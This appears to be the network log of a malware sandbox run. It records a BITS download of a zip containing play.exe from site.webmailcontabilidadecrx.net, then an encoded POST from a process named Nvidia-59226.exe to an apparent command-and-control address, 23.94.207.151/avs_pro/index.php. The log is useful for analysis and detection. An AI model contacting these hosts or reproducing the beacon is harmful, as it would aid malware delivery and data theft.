                                                                        Dec 20, 2024 15:43:33.536358118 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.538500071 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.538573980 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.540476084 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.540541887 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.542546988 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.542614937 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.545088053 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.545187950 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.586138010 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.586373091 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.595933914 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.596026897 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.597969055 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.598043919 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.600435019 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.600502968 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.666057110 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.666198969 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.668414116 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.668502092 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.670718908 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.670797110 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.672836065 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.672905922 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.674906969 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.674982071 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.677607059 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.677678108 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.679708004 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.679780960 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.728523016 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.728661060 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.730813980 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.730881929 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.732892990 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.732969999 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.735014915 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.735086918 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.737644911 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.737740040 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.777476072 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.777648926 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.787430048 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.787529945 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.789316893 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.789385080 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.791888952 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.791949034 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.857963085 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.858098030 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.859524012 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.859595060 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.861906052 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.861975908 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.863795042 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.863856077 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.866410017 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.866467953 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.868474007 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.868539095 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.870894909 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.870990992 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.873399973 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.873482943 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.921756983 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.921860933 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.924561977 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.924639940 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.926628113 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.926691055 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.928675890 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.928747892 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.930655956 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.930720091 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.971220970 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.971390009 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.981252909 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.981364965 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.983288050 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.983365059 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:33.985867977 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:33.985929966 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.051260948 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.051426888 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.053426027 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.053497076 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.056242943 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.056319952 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.058294058 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.058368921 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.060337067 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.060409069 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.062583923 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.062697887 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.064948082 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.065032959 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.113240004 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.113342047 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.115499973 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.115569115 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.117995024 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.118057013 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.120166063 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.120239019 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.122298956 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.122399092 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.163327932 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.163424015 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.172569990 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.172650099 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.175091982 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.175189972 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.177113056 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.177206993 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.244601011 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.244756937 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.246459007 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.246541023 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.248625040 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.248703957 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.251100063 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.251178980 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.253196955 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.253271103 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.255547047 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.255620956 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.257504940 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.257572889 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.305176973 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.305360079 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.306900978 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.306997061 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.309562922 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.309660912 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.311625957 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.311727047 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.314269066 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.314349890 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.359498978 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.359585047 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.385796070 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.385885954 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.387953997 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.388051987 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.389101028 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.389158010 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.436207056 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.436378002 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.437916040 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.437988997 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.440445900 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.440522909 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.442291021 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.442358017 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.444722891 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.444813013 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.446818113 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.446888924 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.448986053 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.449055910 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.451145887 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.451232910 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.498519897 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.498611927 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.500488997 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.500565052 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.503129005 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.503199100 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.505105019 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.505172968 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.507164955 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.507239103 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.552642107 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.552781105 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.579025030 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.579179049 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.580550909 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.580651999 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.583277941 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.583348036 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.629376888 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.629446983 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.631665945 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.631735086 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.633630037 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.633686066 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.636188984 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.636246920 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.638325930 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.638401031 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.640516996 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.640592098 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.643090010 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.643161058 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.689973116 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.690042019 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.692074060 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.692130089 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.694783926 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.694871902 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.696686983 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.696742058 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.698833942 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.698894978 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.744384050 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.744461060 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.770031929 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.770104885 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.772077084 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.773880959 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.774678946 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.774749041 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.822622061 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.822702885 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.824506044 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.824579000 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.826575041 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.826630116 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.829531908 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.829626083 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.831372976 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.831442118 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.833728075 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.833800077 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.835621119 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.835690022 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.837009907 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.837068081 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.837075949 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.837112904 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.837177038 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.837224960 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.838270903 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.838287115 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:34.838299036 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:34.838304043 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:42.852863073 CET4978780192.168.2.623.94.207.151
                                                                        Dec 20, 2024 15:43:42.972558022 CET804978723.94.207.151192.168.2.6
                                                                        Dec 20, 2024 15:43:42.972795010 CET4978780192.168.2.623.94.207.151
                                                                        Dec 20, 2024 15:43:42.973079920 CET4978780192.168.2.623.94.207.151
                                                                        Dec 20, 2024 15:43:42.973079920 CET4978780192.168.2.623.94.207.151
                                                                        Dec 20, 2024 15:43:43.094290018 CET804978723.94.207.151192.168.2.6
                                                                        Dec 20, 2024 15:43:43.094295025 CET804978723.94.207.151192.168.2.6
                                                                        Dec 20, 2024 15:43:44.285937071 CET804978723.94.207.151192.168.2.6
                                                                        Dec 20, 2024 15:43:44.325670004 CET4978780192.168.2.623.94.207.151
                                                                        Dec 20, 2024 15:43:49.291587114 CET804978723.94.207.151192.168.2.6
                                                                        Dec 20, 2024 15:43:49.291758060 CET4978780192.168.2.623.94.207.151
                                                                        Dec 20, 2024 15:43:49.589293003 CET4978780192.168.2.623.94.207.151
                                                                        Dec 20, 2024 15:43:49.708769083 CET804978723.94.207.151192.168.2.6
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 20, 2024 15:43:17.523578882 CET5296353192.168.2.61.1.1.1
                                                                        Dec 20, 2024 15:43:17.660672903 CET53529631.1.1.1192.168.2.6
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 20, 2024 15:43:17.523578882 CET192.168.2.61.1.1.10x69ddStandard query (0)site.webmailcontabilidadecrx.netA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 20, 2024 15:43:17.660672903 CET1.1.1.1192.168.2.60x69ddNo error (0)site.webmailcontabilidadecrx.net34.95.215.169A (IP address)IN (0x0001)false
                                                                        • site.webmailcontabilidadecrx.net
                                                                        • 23.94.207.151
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.64978723.94.207.151807556C:\Nvidia-59226\Nvidia-59226.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 20, 2024 15:43:42.973079920 CET250OUTPOST /avs_pro/index.php HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
                                                                        Accept: */*
                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                        Content-Length: 135
                                                                        Host: 23.94.207.151
                                                                        Dec 20, 2024 15:43:42.973079920 CET135OUTData Raw: 6f 70 3d 35 72 42 56 72 2f 54 6f 4d 56 35 43 53 69 56 79 61 32 77 52 61 41 46 30 42 77 4e 35 44 46 30 6f 4d 56 6b 6a 42 6c 6c 66 56 6c 78 44 52 68 59 47 43 42 6c 62 57 30 4a 4b 57 42 68 65 52 56 64 66 46 41 4d 43 64 56 46 4e 47 54 5a 50 49 53 38
                                                                        Data Ascii: op=5rBVr/ToMV5CSiVya2wRaAF0BwN5DF0oMVkjBllfVlxDRhYGCBlbW0JKWBheRVdfFAMCdVFNGTZPIS8YfnV9ZGcVcnJ+fCQvKSglcmsDAhwFBxkFCAteS1xDQmUDCwYBaRY=
                                                                        Dec 20, 2024 15:43:44.285937071 CET203INHTTP/1.1 200 OK
                                                                        Date: Fri, 20 Dec 2024 14:43:43 GMT
                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                        Content-Length: 0
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Content-Type: text/html; charset=UTF-8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.64972334.95.215.1694436368C:\Windows\System32\svchost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-20 14:43:19 UTC182OUTHEAD /notafiscal/download/cat.zip HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        Accept-Encoding: identity
                                                                        User-Agent: Microsoft BITS/7.8
                                                                        Host: site.webmailcontabilidadecrx.net
                                                                        2024-12-20 14:43:19 UTC267INHTTP/1.1 200 OK
                                                                        Date: Fri, 20 Dec 2024 14:43:19 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2
                                                                        Connection: Upgrade, close
                                                                        Last-Modified: Wed, 18 Dec 2024 07:18:28 GMT
                                                                        ETag: "83c3db-6298638673d7e"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 8635355
                                                                        Content-Type: application/zip


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.64972534.95.215.1694436368C:\Windows\System32\svchost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-20 14:43:21 UTC233OUTGET /notafiscal/download/cat.zip HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        Accept-Encoding: identity
                                                                        If-Unmodified-Since: Wed, 18 Dec 2024 07:18:28 GMT
                                                                        User-Agent: Microsoft BITS/7.8
                                                                        Host: site.webmailcontabilidadecrx.net
                                                                        2024-12-20 14:43:21 UTC267INHTTP/1.1 200 OK
                                                                        Date: Fri, 20 Dec 2024 14:43:21 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2
                                                                        Connection: Upgrade, close
                                                                        Last-Modified: Wed, 18 Dec 2024 07:18:28 GMT
                                                                        ETag: "83c3db-6298638673d7e"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 8635355
                                                                        Content-Type: application/zip
                                                                        2024-12-20 14:43:21 UTC7925INData Raw: 50 4b 03 04 14 00 00 00 08 00 3b 21 92 59 2a fe 82 59 45 c3 83 00 a0 87 86 00 08 00 00 00 70 6c 61 79 2e 65 78 65 ec bd 65 54 1c c1 df ef d9 b8 33 10 20 b8 bb bb 06 42 70 08 04 87 00 41 83 0d ee ee c1 19 3c b8 05 82 bb 7b b0 24 68 80 e0 16 3c 24 0c 04 77 4b 58 66 f8 df 73 9f 7d ce de bd 6f f6 d5 9e 3b e7 40 7f e7 f3 93 e9 ae 9e ae ae ea aa ee 79 65 90 08 20 01 00 80 fc f0 77 7f 0f 00 6d c0 e3 eb 05 f0 bf 7f 05 3f fc e1 52 77 e0 02 4d 18 63 b4 6d 08 2a 63 b4 da 60 1b 37 1a 67 57 27 6b 57 33 07 1a 73 33 47 47 27 77 9a b7 96 34 ae 1e 8e 34 36 8e 34 b2 6a 5a 34 0e 4e 16 96 5c 38 38 98 0c ff c9 a1 2e 07 00 2a 08 e8 00 6f ff 91 e5 ff c8 bb 0e 20 22 60 21 e0 32 01 b8 0f 6f 14 11 e0 cc 21 fd 27 00 e0 3d 08 1a e0 71 ed 60 1a 11 00 50 e1 d6 ff b9 04 12 f7 e1 1b 83
                                                                        Data Ascii: PK;!Y*YEplay.exeeT3 BpA<{$h<$wKXfs}o;@ye wm?RwMcm*c`7gW'kW3s3GG'w4464jZ4N\88.*o "`!2o!'=q`P
                                                                        2024-12-20 14:43:21 UTC8000INData Raw: a9 4d 1d 38 9d fd 5a fa 24 cd 33 3b 40 6d 79 dc 4a 00 c7 f7 21 b9 b1 bf 03 d8 e5 a3 a4 44 e6 8b c3 9c 39 2c 07 ec cf 5e ea ed 4f f5 09 e6 ea 66 c1 4d af d1 ea c1 92 81 ac 74 56 0f 6d ae 00 04 2c 00 76 1d 1e 80 e4 b5 21 c3 8e 2e 54 29 a9 8b 45 30 1f 57 f6 47 d8 49 1f 47 2a b8 af 1a 1a c3 f7 d0 c2 38 80 7d 7d 21 a8 e0 0a 9e 9c dd 5e 0b 06 c0 9a ff 4b 88 3d 03 d0 d9 d3 30 05 4a f0 78 13 04 ef ef 42 5b 0d 82 81 85 8f a7 e9 9e 2c 44 4a eb 39 83 ad b6 62 44 5a 33 1d b7 c8 4c 0d 75 83 43 9f ea 56 d4 3b 63 64 e2 25 56 9b 1b bf 57 5c 30 f1 ae 29 e2 06 5e 1c a0 3c 6b f5 20 a6 c3 91 a1 cf 75 28 b5 21 13 64 99 91 a1 1d b8 4a d1 35 49 dc 4c 71 28 31 51 07 36 00 74 f0 b3 d1 2b be 8a 91 bb 67 40 e0 6a 84 41 7d 82 af ac 5e ee 9b 93 6f 6d 68 b7 d3 cb d9 86 f5 4f bf a8 34
                                                                        Data Ascii: M8Z$3;@myJ!D9,^OfMtVm,v!.T)E0WGIG*8}}!^K=0JxB[,DJ9bDZ3LuCV;cd%VW\0)^<k u(!dJ5ILq(1Q6t+g@jA}^omhO4
